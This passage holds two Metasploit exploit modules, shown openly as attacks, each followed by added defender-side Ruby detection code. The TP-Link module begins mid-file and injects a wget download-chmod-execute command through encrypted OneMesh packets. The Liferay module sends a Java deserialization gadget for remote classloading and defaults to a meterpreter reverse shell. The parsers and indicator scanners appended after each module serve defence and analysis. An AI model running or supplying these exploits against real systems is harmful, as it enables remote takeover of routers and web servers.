0x0a, 0x00, 0xae, 0x27, 0x7d, 0x07, 0x9e, 0xb1, 0xf0, 0x0f, 0x93, 0x44, 0x87, 0x08, 0xa3, 0xd2, 0x1e, 0x01, 0xf2, 0x68, 0x69, 0x06, 0xc2, 0xfe, 0xf7, 0x62, 0x57, 0x5d, 0x80, 0x65, 0x67, 0xcb, 0x19, 0x6c, 0x36, 0x71, 0x6e, 0x6b, 0x06, 0xe7, 0xfe, 0xd4, 0x1b, 0x76, 0x89, 0xd3, 0x2b, 0xe0, 0x10, 0xda, 0x7a, 0x5a, 0x67, 0xdd, 0x4a, 0xcc, 0xf9, 0xb9, 0xdf, 0x6f, 0x8e, 0xbe, 0xef, 0xf9, 0x17, 0xb7, 0xbe, 0x43, 0x60, 0xb0, 0x8e, 0xd5, 0xd6, 0xd6, 0xa3, 0xe8, 0xa1, 0xd1, 0x93, 0x7e, 0x38, 0xd8, 0xc2, 0xc4, 0x4f, 0xdf, 0xf2, 0x52, 0xd1, 0xbb, 0x67, 0xf1, 0xa6, 0xbc, 0x57, 0x67, 0x3f, 0xb5, 0x06, 0xdd, 0x48, 0xb2, 0x36, 0x4b, 0xd8, 0x0d, 0x2b, 0xda, 0xaf, 0x0a, 0x1b, 0x4c, 0x36, 0x03, 0x4a, 0xf6, 0x41, 0x04, 0x7a, 0x60, 0xdf, 0x60, 0xef, 0xc3, 0xa8, 0x67, 0xdf, 0x55, 0x31, 0x6e, 0x8e, 0xef, 0x46, 0x69, 0xbe, 0x79, 0xcb, 0x61, 0xb3, 0x8c, 0xbc, 0x66, 0x83, 0x1a, 0x25, 0x6f, 0xd2, 0xa0, 
0x52, 0x68, 0xe2, 0x36, 0xcc, 0x0c, 0x77, 0x95, 0xbb, 0x0b, 0x47, 0x03, 0x22, 0x02, 0x16, 0xb9, 0x55, 0x05, 0x26, 0x2f, 0xc5, 0xba, 0x3b, 0xbe, 0xb2, 0xbd, 0x0b, 0x28, 0x2b, 0xb4, 0x5a, 0x92, 0x5c, 0xb3, 0x6a, 0x04, 0xc2, 0xd7, 0xff, 0xa7, 0xb5, 0xd0, 0xcf, 0x31, 0x2c, 0xd9, 0x9e, 0x8b, 0x5b, 0xde, 0xae, 0x1d, 0x9b, 0x64, 0xc2, 0xb0, 0xec, 0x63, 0xf2, 0x26, 0x75, 0x6a, 0xa3, 0x9c, 0x02, 0x6d, 0x93, 0x0a, 0x9c, 0x09, 0x06, 0xa9, 0xeb, 0x0e, 0x36, 0x3f, 0x72, 0x07, 0x67, 0x85, 0x05, 0x00, 0x57, 0x13, 0x95, 0xbf, 0x4a, 0x82, 0xe2, 0xb8, 0x7a, 0x14, 0x7b, 0xb1, 0x2b, 0xae, 0x0c, 0xb6, 0x1b, 0x38, 0x92, 0xd2, 0x8e, 0x9b, 0xe5, 0xd5, 0xbe, 0x0d, 0x7c, 0xdc, 0xef, 0xb7, 0x0b, 0xdb, 0xdf, 0x21, 0x86, 0xd3, 0xd2, 0xd4, 0xf1, 0xd4, 0xe2, 0x42, 0x68, 0xdd, 0xb3, 0xf8, 0x1f, 0xda, 0x83, 0x6e, 0x81, 0xbe, 0x16, 0xcd, 0xf6, 0xb9, 0x26, 0x5b, 0x6f, 0xb0, 0x77, 0xe1, 0x18, 0xb7, 0x47, 0x77, 0x88, 0x08, 0x5a, 0xe6, 0xff, 0x0f, 0x6a, 0x70, 0x66, 0x06, 0x3b, 0xca, 0x11, 0x01, 0x0b, 0x5c, 0x8f, 0x65, 0x9e, 0xff, 0xf8, 0x62, 0xae, 0x69, 0x61, 0x6b, 0xff, 0xd3, 0x16, 0x6c, 0xcf, 0x45, 0xa0, 0x0a, 0xe2, 0x78, 0xd7, 0x0d, 0xd2, 0xee, 0x4e, 0x04, 0x83, 0x54, 0x39, 0x03, 0xb3, 0xc2, 0xa7, 0x67, 0x26, 0x61, 0xd0, 0x60, 0x16, 0xf7, 0x49, 0x69, 0x47, 0x4d, 0x3e, 0x6e, 0x77, 0xdb, 0xae, 0xd1, 0x6a, 0x4a, 0xd9, 0xd6, 0x5a, 0xdc, 0x40, 0xdf, 0x0b, 0x66, 0x37, 0xd8, 0x3b, 0xf0, 0xa9, 0xbc, 0xae, 0x53, 0xde, 0xbb, 0x9e, 0xc5, 0x47, 0xb2, 0xcf, 0x7f, 0x30, 0xb5, 0xff, 0xe9, 0xbd, 0xbd, 0xf2, 0x1c, 0xca, 0xba, 0xc2, 0x8a, 0x53, 0xb3, 0x93, 0x30, 0x24, 0xb4, 0xa3, 0xa6, 0xba, 0xd0, 0x36, 0x05, 0xcd, 0xd7, 0x06, 0x93, 0x54, 0xde, 0x57, 0x29, 0x23, 0xd9, 0x67, 0xbf, 0xb3, 0x66, 0x7a, 0x2e, 0xc4, 0x61, 0x4a, 0xb8, 0x5d, 0x68, 0x1b, 0x02, 0x2a, 0x6f, 0x2b, 0x94, 0xb4, 0x0b, 0xbe, 0x37, 0xc3, 0x0c, 0x8e, 0xa1, 0x5a, 0x05, 0xdf, 0x1b, 0x2d, 0x02, 0xef, 0x8d] res = 0xffffffff # main checksum calculation packet.each_entry { |c| index = ((c ^ res) & 0xff) * 4 # .reverse is needed as the target is big endian 
      ref = (reference_tbl[index..index+3].reverse.pack('C*').unpack('L').first)
      res = ref ^ (res >> 8)
    }
    checksum = ~res
    checksum_s = [(checksum)].pack('I>').force_encoding("ascii")
    # convert back to string
    packet = packet.pack('C*').force_encoding('ascii')
    # and replace the checksum
    packet[12] = checksum_s[0]
    packet[13] = checksum_s[1]
    packet[14] = checksum_s[2]
    packet[15] = checksum_s[3]
    packet
  end

  def aes_encrypt(plaintext)
    # Function encrypts perfectly 16 bytes aligned payload
    if (plaintext.length % 16 != 0)
      return
    end
    cipher = OpenSSL::Cipher.new 'AES-128-CBC'
    # in the original C code the key and IV are 256 bits long... but they still use AES-128
    iv = "1234567890abcdef"
    key = "TPONEMESH_Kf!xn?"
    encrypted = ''
    cipher.encrypt
    cipher.iv = iv
    cipher.key = key
    # Take each 16 bytes block and encrypt it
    plaintext.scan(/.{1,16}/) { |block|
      encrypted += cipher.update(block)
    }
    encrypted
  end

  def create_injection(c)
    # Template for the command injection
    # The injection happens at "slave_mac" (read advisory for details)
    # The payload will have to be padded to exactly 16 bytes to ensure reliability between different OpenSSL versions.
    # This will fail if we send a command with single quotes (')
    # ... but that's not a problem for this module, since we don't use them for our command.
    # It might also fail with double quotes (") since this will break the JSON...
    inject = "\';printf \'#{c}\'>>#{@cmd_file}\'"
    template = "{\"method\":\"slave_key_offer\",\"data\":{"\
      "\"group_id\":\"#{rand_text_numeric(1..3)}\","\
      "\"ip\":\"#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}\","\
      "\"slave_mac\":\"%{INJECTION}\","\
      "\"slave_private_account\":\"#{rand_text_alpha(5..13)}\","\
      "\"slave_private_password\":\"#{rand_text_alpha(5..13)}\","\
      "\"want_to_join\":false,"\
      "\"model\":\"#{rand_text_alpha(5..13)}\","\
      "\"product_type\":\"#{rand_text_alpha(5..13)}\","\
      "\"operation_mode\":\"A%{PADDING}\"}}"
    # This is required to calculate exact template length without replace flags
    template_len = template.length - '%{INJECTION}'.length - '%{PADDING}'.length
    # This has to be initialized to cover the situation when no padding is needed
    pad = ''
    padding = rand_text_alpha(16)
    template_len += inject.length
    # Calculate pad if padding is needed
    if (template_len % 16 != 0)
      pad = padding[0..15-(template_len % 16)]
    end
    # Here the final payload is created
    template % {INJECTION:"#{inject}", PADDING:"#{pad}"}
  end

  def update_len_field(packet, payload_length)
    new_packet = packet[0..3]
    new_packet += [payload_length].pack("S>")
    new_packet += packet[6..-1]
  end

  def exec_cmd_file(packet)
    # This function handles special action of exec
    # Returns new complete tpdp packet
    inject = "\';sh #{@cmd_file}\'"
    payload = create_injection(inject)
    ciphertext = aes_encrypt(payload)
    if not ciphertext
      fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!")
    end
    new_packet = packet[0..15]
    new_packet += ciphertext
    new_packet = update_len_field(new_packet, ciphertext.length)
    calc_checksum(new_packet.bytes)
  end

  # Handle incoming requests from the router
  def on_request_uri(cli, request)
    print_good("#{peer} - Sending executable to the router")
    print_good("#{peer} - Sit back and relax, Shelly will come visit soon!")
    send_response(cli, @payload_exe)
    @payload_sent = true
  end

  def exploit
    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
      fail_with(Failure::Unreachable, "#{peer} - Please specify the LAN IP address of this computer in SRVHOST")
    end
    if datastore['SSL']
      fail_with(Failure::Unknown, "SSL is not supported on this target, please disable it")
    end
    print_status("Attempting to exploit #{target.name}")
    tpdp_packet_template = [0x01].pack('C*') + # packet version, fixed to 1
      [0xf0].pack('C*') + # set packet type to 0xf0 (onemesh)
      [0x07].pack('S>*') + # onemesh opcode, used by the onemesh_main switch table
      [0x00].pack('S>*') + # packet len
      [0x01].pack('C*') + # some flag, has to be 1 to enter the vulnerable onemesh function
      [0x00].pack('C*') + # unknown field
      [rand(0xff),rand(0xff),rand(0xff),rand(0xff)].pack('C*') + # serial number, can be any value
      [0x5A,0x6B,0x7C,0x8D].pack('C*') # Checksum placeholder
    srv_host = datastore['SRVHOST']
    srv_port = datastore['SRVPORT']
    @cmd_file = rand_text_alpha_lower(1)
    # generate our payload executable
    @payload_exe = generate_payload_exe
    # Command that will download @payload_exe and execute it
    download_cmd = "wget http://#{srv_host}:#{srv_port}/#{@cmd_file};chmod +x #{@cmd_file};./#{@cmd_file}"
    http_service = 'http://' + srv_host + ':' + srv_port.to_s
    print_status("Starting up our web service on #{http_service} ...")
    start_service({'Uri' => {
      'Proc' => Proc.new { |cli, req|
        on_request_uri(cli, req)
      },
      'Path' => "/#{@cmd_file}"
    }})
    print_status("#{peer} - Connecting to the target")
    connect_udp
    print_status("#{peer} - Sending command file byte by byte")
    print_status("#{peer} - Command: #{download_cmd}")
    mod = download_cmd.length / 5
    download_cmd.each_char.with_index { |c, index|
      # Generate payload
      payload = create_injection(c)
      if not payload
        fail_with(Failure::Unknown, "#{peer} - Failed to setup download command!")
      end
      # Encrypt payload
      ciphertext = aes_encrypt(payload)
      if not ciphertext
        fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!")
      end
      tpdp_packet = tpdp_packet_template.dup
      tpdp_packet += ciphertext
      tpdp_packet = update_len_field(tpdp_packet, ciphertext.length)
      tpdp_packet = calc_checksum(tpdp_packet.bytes)
      udp_sock.put(tpdp_packet)
      # Sleep to make sure the payload is processed by a target
      Rex.sleep(1)
      # Print progress
      if ((index+1) % mod == 0)
        percentage = 20 * ((index+1) / mod)
        # very advanced mathematics in use here to show the progress bar
        print_status("#{peer} - [0%]=#{' =' * ((percentage*2/10-1)-1)}>#{' -'*(20-(percentage*2/10))}[100%]")
        if percentage == 100
          # a bit of cheating to get the last char done right
          index = -2
        end
        #print_status("#{peer} - #{download_cmd[0..index+1]}#{'-' * (download_cmd[index+1..-1].length-1)}")
      end
    }
    # Send the exec command. From here we should receive the connection
    print_status("#{peer} - Command file sent, attempting to execute...")
    tpdp_packet = exec_cmd_file(tpdp_packet_template.dup)
    udp_sock.put(tpdp_packet)
    timeout = 0
    while not @payload_sent
      Rex.sleep(1)
      timeout += 1
      if timeout == datastore['MAX_WAIT'].to_i
        fail_with(Failure::Unknown, "#{peer} - Timeout reached! Payload was not downloaded :(")
      end
    end
    disconnect_udp
  end
end
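The module's checksum loop walks a lookup table whose final entries on the page (0x5a05df1b, 0x2d02ef8d) are those of the standard CRC-32 table, so the routine computes an ordinary CRC-32 over the frame while the bytes 5A 6B 7C 8D sit in the checksum field, and the packet template documents the 16-byte TPDP header layout. The following is an added, defender-side example and not code from the module or its author: a Ruby parser that a network sensor could use to decode a TPDP header, verify the checksum (restoring the placeholder first, which is the detail that makes a naive CRC over the final bytes fail), and flag frames with the onemesh type, opcode and flag the module sends. `build_test_frame` is a constructed fixture for exercising the verifier, and using `Zlib.crc32` assumes the full table is the standard one; the field names beyond the page's comments are assumptions.

```ruby
require 'zlib'

# TPDP header as laid out by the packet template above (16 bytes):
#   0      protocol version (1)
#   1      packet type (0xf0 = onemesh)
#   2-3    opcode, big-endian uint16
#   4-5    payload length, big-endian uint16
#   6      flag (1 reaches the onemesh handler)
#   7      unknown byte
#   8-11   serial number
#   12-15  CRC-32 of the whole frame, big-endian, computed with the
#          placeholder 5A 6B 7C 8D occupying this field
TPDP_HEADER_LEN = 16
TPDP_TYPE_ONEMESH = 0xf0
ONEMESH_OPCODE = 0x07
CHECKSUM_PLACEHOLDER = "\x5A\x6B\x7C\x8D".b

# Decode the header into a hash; nil if the frame is shorter than a header.
def parse_tpdp(packet)
  pkt = packet.b
  return nil if pkt.bytesize < TPDP_HEADER_LEN
  version, type, opcode, length, flag, _unknown, serial, checksum =
    pkt.unpack('CCS>S>CCL>L>')
  {
    version: version, type: type, opcode: opcode, length: length,
    flag: flag, serial: serial, checksum: checksum,
    payload: pkt.byteslice(TPDP_HEADER_LEN, pkt.bytesize - TPDP_HEADER_LEN)
  }
end

# CRC-32 the way the module computes it: over the full frame with the
# placeholder bytes back in the checksum field (assumes the standard table).
def expected_checksum(packet)
  pkt = packet.b               # String#b returns a copy, so the input is untouched
  pkt[12, 4] = CHECKSUM_PLACEHOLDER
  Zlib.crc32(pkt)
end

def checksum_valid?(packet)
  hdr = parse_tpdp(packet)
  return false unless hdr
  hdr[:checksum] == expected_checksum(packet)
end

# True for a well-formed frame carrying the onemesh type/opcode/flag
# combination the module sends; a sensor would log or alert on these.
def onemesh_frame?(packet)
  hdr = parse_tpdp(packet)
  return false unless hdr
  hdr[:type] == TPDP_TYPE_ONEMESH &&
    hdr[:opcode] == ONEMESH_OPCODE &&
    hdr[:flag] == 1 &&
    hdr[:length] == hdr[:payload].bytesize &&
    checksum_valid?(packet)
end

# Constructed test fixture: a frame with the header fields above, an
# arbitrary payload and a correctly placed checksum (no encryption).
def build_test_frame(payload, serial: 0x11223344)
  header = [1, TPDP_TYPE_ONEMESH, ONEMESH_OPCODE, payload.bytesize, 1, 0, serial]
           .pack('CCS>S>CCL>')
  frame = header + CHECKSUM_PLACEHOLDER + payload.b
  frame[12, 4] = [Zlib.crc32(frame)].pack('L>')
  frame
end

if __FILE__ == $PROGRAM_NAME
  frame = build_test_frame("hello world".b)
  puts "header:   #{parse_tpdp(frame).reject { |k, _| k == :payload }}"
  puts "checksum: #{checksum_valid?(frame) ? 'valid' : 'INVALID'}"
  puts "onemesh:  #{onemesh_frame?(frame)}"
end
```

A frame whose payload is modified in transit fails `checksum_valid?`, and a frame that passes every check while carrying type 0xf0 with opcode 7 is exactly the traffic shape worth alerting on from a LAN sensor.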
-
Liferay Portal - Java Unmarshalling via JSONWS RCE (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Java::HTTP::ClassLoader
  include Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Liferay Portal Java Unmarshalling via JSONWS RCE',
      'Description' => %q{
        This module exploits a Java unmarshalling vulnerability via JSONWS in
        Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1 GA2
        to execute code as the Liferay user. Tested against 7.2.0 GA1.
      },
      'Author' => [
        'Markus Wulftange', # Discovery
        'Thomas Etrillard', # PoC
        'wvu' # Module
      ],
      'References' => [
        ['CVE', '2020-7961'],
        ['URL', 'https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html'],
        ['URL', 'https://www.synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html'],
        ['URL', 'https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271']
      ],
      'DisclosureDate' => '2019-11-25', # Vendor advisory
      'License' => MSF_LICENSE,
      'Platform' => 'java',
      'Arch' => ARCH_JAVA,
      'Privileged' => false,
      'Targets' => [
        ['Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2', {}]
      ],
      'DefaultTarget' => 0,
      'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_tcp'},
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'Reliability' => [REPEATABLE_SESSION],
        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
      }
    ))

    register_options([
      Opt::RPORT(8080),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    # GET / response contains a Liferay-Portal header with version information
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path)
    )

    unless res
      return CheckCode::Unknown('Target did not respond to check request.')
    end

    unless res.headers['Liferay-Portal']
      return CheckCode::Unknown(
        'Target did not respond with Liferay-Portal header.'
      )
    end

=begin
    Building the Liferay-Portal header:
    https://github.com/liferay/liferay-portal/blob/master/portal-kernel/src/com/liferay/portal/kernel/util/ReleaseInfo.java

    Liferay-Portal header data:
    https://github.com/liferay/liferay-portal/blob/master/release.properties

    Example GET / response:
    HTTP/1.1 200
    [snip]
    Liferay-Portal: Liferay Community Edition Portal 7.2.0 CE GA1 (Mueller / Build 7200 / June 4, 2019)
    [snip]
=end
    version, build = res.headers['Liferay-Portal'].scan(
      /^Liferay.*Portal ([\d.]+.*GA\d+).*Build (\d+)/
    ).flatten

    unless version && (build = Integer(build) rescue nil)
      return CheckCode::Detected(
        'Target did not respond with Liferay version and build.'
      )
    end

    # XXX: Liferay versions older than 7.2.1 GA2 (build 7201) "may" be unpatched
    if build < 7201
      return CheckCode::Appears(
        "Liferay #{version} MAY be a vulnerable version. Please verify."
      )
    end

    CheckCode::Safe("Liferay #{version} is NOT a vulnerable version.")
  end

  def exploit
    # NOTE: Automatic check is implemented by the AutoCheck mixin
    super

    # Start our HTTP server to provide remote classloading
    @classloader_uri = start_service

    unless @classloader_uri
      fail_with(Failure::BadConfig, 'Could not start remote classloader server')
    end

    print_good("Started remote classloader server at #{@classloader_uri}")

    # Send our remote classloader gadget to the target, triggering the vuln
    send_request_gadget(
      normalize_uri(target_uri.path, '/api/jsonws/expandocolumn/update-column'),
      # Required POST parameters for /api/jsonws/expandocolumn/update-column:
      # https://github.com/liferay/liferay-portal/blob/master/portal-impl/src/com/liferay/portlet/expando/service/impl/ExpandoColumnServiceImpl.java
      'columnId' => rand(8..42), # Randomize for "evasion"
      'name' => rand(8..42), # Randomize for "evasion"
      'type' => rand(8..42) # Randomize for "evasion"
    )
  end

  # Convenience method to send our gadget to a URI with desired POST params
  def send_request_gadget(uri, vars_post = {})
    print_status("Sending remote classloader gadget to #{full_uri(uri)}")

    vars_post['+defaultData'] =
      'com.mchange.v2.c3p0.WrapperConnectionPoolDataSource'

    vars_post['defaultData.userOverridesAsString'] =
      "HexAsciiSerializedMap:#{go_go_gadget.unpack1('H*')};"

    send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'vars_post' => vars_post
    }, 0)
  end

  # Generate all marshalsec payloads for the Jackson marshaller:
  # java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a
  def go_go_gadget
    # Implementation of the Jackson marshaller's C3P0WrapperConnPool gadget:
    # https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/gadgets/C3P0WrapperConnPool.java
    gadget = Rex::Text.decode_base64(
      <<~EOF
        rO0ABXNyAD1jb20ubWNoYW5nZS52Mi5uYW1pbmcuUmVmZXJlbmNlSW5kaXJlY3RvciRSZWZl
        cmVuY2VTZXJpYWxpemVkYhmF0NEqwhMCAARMAAtjb250ZXh0TmFtZXQAE0xqYXZheC9uYW1p
        bmcvTmFtZTtMAANlbnZ0ABVMamF2YS91dGlsL0hhc2h0YWJsZTtMAARuYW1lcQB+AAFMAAly
        ZWZlcmVuY2V0ABhMamF2YXgvbmFtaW5nL1JlZmVyZW5jZTt4cHBwcHNyABZqYXZheC5uYW1p
        bmcuUmVmZXJlbmNl6MaeoqjpjQkCAARMAAVhZGRyc3QAEkxqYXZhL3V0aWwvVmVjdG9yO0wA
        DGNsYXNzRmFjdG9yeXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAFGNsYXNzRmFjdG9yeUxvY2F0
        aW9ucQB+AAdMAAljbGFzc05hbWVxAH4AB3hwc3IAEGphdmEudXRpbC5WZWN0b3LZl31bgDuv
        AQMAA0kAEWNhcGFjaXR5SW5jcmVtZW50SQAMZWxlbWVudENvdW50WwALZWxlbWVudERhdGF0
        ABNbTGphdmEvbGFuZy9PYmplY3Q7eHAAAAAAAAAAAHVyABNbTGphdmEubGFuZy5PYmplY3Q7
        kM5YnxBzKWwCAAB4cAAAAApwcHBwcHBwcHBweHQABEhBQ0t0AANUSEV0AAZQTEFORVQ=
      EOF
    )

    # Replace length-prefixed placeholder strings with our own
    gadget.sub!("\x00\x04HACK", packed_class_name)
    gadget.sub!("\x00\x03THE", packed_classloader_uri)
    gadget.sub("\x00\x06PLANET", packed_class_name)
  end

  # Convenience method to pack the classloader URI as a length-prefixed string
  def packed_classloader_uri
    "#{[@classloader_uri.length].pack('n')}#{@classloader_uri}"
  end

end
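The module's check decides from the Liferay-Portal response header (version and build number, with 7201 as the first build it treats as patched), and its request carries three distinctive markers: a POST to /api/jsonws/, a parameter name prefixed with `+` that names a class (here `com.mchange.v2.c3p0.WrapperConnectionPoolDataSource`), and a `HexAsciiSerializedMap:` value. The following is an added, defender-side example and not code from the module or its authors: a Ruby banner parser that applies the same build threshold as the check, plus an indicator scan over constructed request records of the kind a reverse proxy or WAF log would hold. The record format (method, path, body) and the sample bodies are constructed for this example; the build threshold and markers come from the module above.

```ruby
# First build the module's check treats as not vulnerable (7.2.1 GA2).
PATCHED_BUILD = 7201

# Parse the Liferay-Portal banner, e.g.
# "Liferay Community Edition Portal 7.2.0 CE GA1 (Mueller / Build 7200 / June 4, 2019)"
# into its version string and numeric build; nil if it does not look like one.
def parse_liferay_banner(header)
  m = header.to_s.match(/Portal ([\d.]+.*?GA\d+).*Build (\d+)/)
  return nil unless m
  { version: m[1], build: m[2].to_i }
end

# true  => build predates 7201 and the install needs verification/patching
# false => build is 7201 or later
# nil   => header is absent or not a Liferay banner
def possibly_unpatched?(header)
  info = parse_liferay_banner(header)
  return nil unless info
  info[:build] < PATCHED_BUILD
end

# Request-body markers of the unmarshalling request shown in the module.
# Bodies are matched raw, so a '+' parameter is caught whether it arrives
# literally or percent-encoded as %2B.
JSONWS_BODY_INDICATORS = {
  typed_param: /(?:^|&)(?:\+|%2B)\w+=/i,          # "+name=" parameter form
  hex_serialized_map: /HexAsciiSerializedMap/,    # hex-encoded Java serialized map
  c3p0_datasource: /com\.mchange\.v2\.c3p0/       # the gadget's data source class
}.freeze

# Return the list of indicators present in one request record
# ({ method:, path:, body: }); an empty list means nothing matched.
def jsonws_indicators(request)
  hits = []
  if request[:method] == 'POST' && request[:path].to_s.start_with?('/api/jsonws/')
    hits << :jsonws_post
  end
  body = request[:body].to_s
  JSONWS_BODY_INDICATORS.each { |name, re| hits << name if body.match?(re) }
  hits
end

# A JSONWS POST combined with at least one body marker is worth an alert;
# a JSONWS POST on its own is ordinary application traffic.
def suspicious_jsonws_request?(request)
  hits = jsonws_indicators(request)
  hits.include?(:jsonws_post) && (hits - [:jsonws_post]).any?
end

# Constructed sample records (not captured traffic); the serialized
# payload in the first body is replaced by a short placeholder.
SAMPLE_REQUESTS = [
  { method: 'POST', path: '/api/jsonws/expandocolumn/update-column',
    body: 'columnId=12&name=17&type=20' \
          '&%2BdefaultData=com.mchange.v2.c3p0.WrapperConnectionPoolDataSource' \
          '&defaultData.userOverridesAsString=HexAsciiSerializedMap%3A0000%3B' },
  { method: 'GET', path: '/web/guest/home', body: '' },
  { method: 'POST', path: '/api/jsonws/expandocolumn/update-column',
    body: 'columnId=12&name=17&type=20' }
].freeze

if __FILE__ == $PROGRAM_NAME
  banner = 'Liferay Community Edition Portal 7.2.0 CE GA1 (Mueller / Build 7200 / June 4, 2019)'
  puts "#{parse_liferay_banner(banner)} unpatched? #{possibly_unpatched?(banner)}"
  SAMPLE_REQUESTS.each do |req|
    puts "#{req[:method]} #{req[:path]}: #{jsonws_indicators(req).inspect} " \
         "=> #{suspicious_jsonws_request?(req) ? 'ALERT' : 'ok'}"
  end
end
```

Matching the raw body rather than a decoded parameter map is deliberate: form decoders turn a literal `+` into a space, which would hide the `+defaultData` form from a key-based check.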